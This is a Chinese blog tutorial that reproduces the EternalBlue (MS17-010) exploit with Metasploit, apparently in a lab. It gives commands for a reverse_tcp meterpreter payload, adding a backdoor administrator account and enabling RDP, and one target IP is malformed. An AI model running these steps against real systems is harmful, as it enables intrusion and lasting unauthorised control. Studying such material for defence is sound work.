【永恒之蓝】漏洞复现过程

于 2024-07-26 06:30:00 发布
阅读量217 收藏 7
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/muyuchen110/article/details/140699850
版权

永恒之蓝概述

                  永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,
不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。

漏洞复现:

kali 终端输入 msfconsole #打开msf框架

msf6 > search ms17-010 # 搜索漏洞相关的攻击模块

 

msf6 > use 3 #使用攻击验证的模块来探测是否存在漏洞

 

show options # 查看模块怎么使用

 

set RHOSTS 192.168.0.31 # 设置目标 

 

run # 开始攻击

 

search ms17-010 # 寻找攻击模块

use exploit/windows/smb/ms17_010_eternalblue #使用攻击模块

set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷

show options # 查看模块怎么使用

 

set RHOSTS 192.253.136 # 设置攻击目标

 

exploit #开始攻击 也可以用run

 

screenshot # 截图

 

shell #获取一个交互式的shell

chcp 65001 #修改编码为UTF-8

 

net user # 查看自己电脑都有哪些用户

 

net user 用户名 密码 /add # 向目标机器添加后门账户

 

net localgroup administrators 用户名 /add #把指定用户加入管理员组

 

exit # 退出之后,来到 meterpreter 会话

 

让目标允许被连接 

meterpreter > run post/windows/manage/enable_rdp

 

远程登录其计算机

rdesktop 192.168.253.136

 

 

 

muyuchen110
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之漏洞过程
hhf小菜鸡的博客
05-12 657
漏洞过程 1.准备一台kali虚拟机,一台windows7 2.打开kali,查看kali的IP地址,命令:ifconfig 3.知道kali的IP地址为:192.168.43.116之后使用kali自带的nmap网络扫描工具扫描192.168.43.0网段下存活的主机,命令:nmap -sS 192.168.43.0/24 在这里我选择了IP地址为192.168.43.67的主机作为我的漏洞利用对象,因为我觉得他的主机端口开放的最多,成功的几率比较大,而且它的445端口也是开放的 4.接下来可以看看这
永恒之漏洞
qq_63301612的博客
11-28 911
简洁的出永恒之
永恒之漏洞(详细版)
Zqinglele的博客
03-20 2555
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
渗透测试基础之永恒之漏洞
weixin_72543266的博客
09-08 1416
渗透测试(Penetration Testing)是指专业的安全测试人员模拟黑客攻击的行为,对目标系统进行主动攻击测试的过程。通过模拟攻击,渗透测试帮助企业评估其系统或网络的安全性,发潜在的安全漏洞和弱点,从而提供相应的防护措施和改进建议。渗透测试的目的是帮助组织发和修系统中的安全漏洞,以提升安全性和防御能力。每日一言。
永恒之漏洞(ms17-010)
热门推荐
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
ms17永恒之漏洞过程(kali-server2003)
AmyBaby00的博客
11-12 2549
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 永恒之是利用Windows操作系统445端口存在的漏洞进行传播,并具有自我制、主动传播的特性。 基于Windows网络共享协议进行攻击传播的蠕虫恶意代码 一、测试准备: 目标机:server 2003 攻击机:kali 利用Nmap扫描IP ,查看已开启端口 发445端口...
永恒之漏洞(包括常见问题处理)和修方案
sinat_27757177的博客
10-17 5001
永恒之漏洞(包括常见问题处理)和修方案
linux 会不会受到永恒之漏洞,永恒之漏洞(ms17-010)
weixin_28829479的博客
05-16 443
永恒之漏洞(ms17-010)漏洞描述:Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。影响版本:目前已知受影响的Windows 版本包括但不限于:WindowsNT,Win...
基础渗透测试实验—永恒之漏洞
G6_12的博客
06-08 4070
ms17-010,永恒之漏洞
ms17-010(永恒之漏洞
Filotimo_的博客
09-09 2265
ms17-010(永恒之)利用的端口是445端口。本文主要讲解ms17-010(永恒之漏洞
永恒之漏洞扫描工具官方版
08-06
"永恒之漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之漏洞检测工具
10-10
永恒之漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,...
永恒之漏洞演示
12-22
利用kali linux在windows7上演示永恒之漏洞,有kali实战经验的可以看懂
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 253
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
如何避免屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 623
轻量部署,安全和业务连续性才能两不误
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞
TechEnthusiast的博客
07-23 220
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修建议,甚至在某些情况下自动进行修。Kubescape作为一个全面的Kubernetes安全平台,其镜像修功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修流程,它大大降低了维护Kubernetes环境安全性的杂度和工作量。
【技术升级】Docker环境下Nacos平滑升级攻略,安全配置一步到位
IT后浪的博客
07-23 503
目前项目当中使用的Nacos版本为2.0.2,该版本可能存在一定的安全风险。软件的安全性是一个持续关注的问题,尤其是对于像Nacos这样的服务发与配置管理平台,它在微服务架构中扮演着核心角色。随着新版本的发布,开发团队会修已知的安全漏洞,并增强系统的整体安全性。因此要及时升级Nacos,避免因为安全问题,对项目造成影响。
永恒之漏洞流程
09-01
需要注意的是,永恒之漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值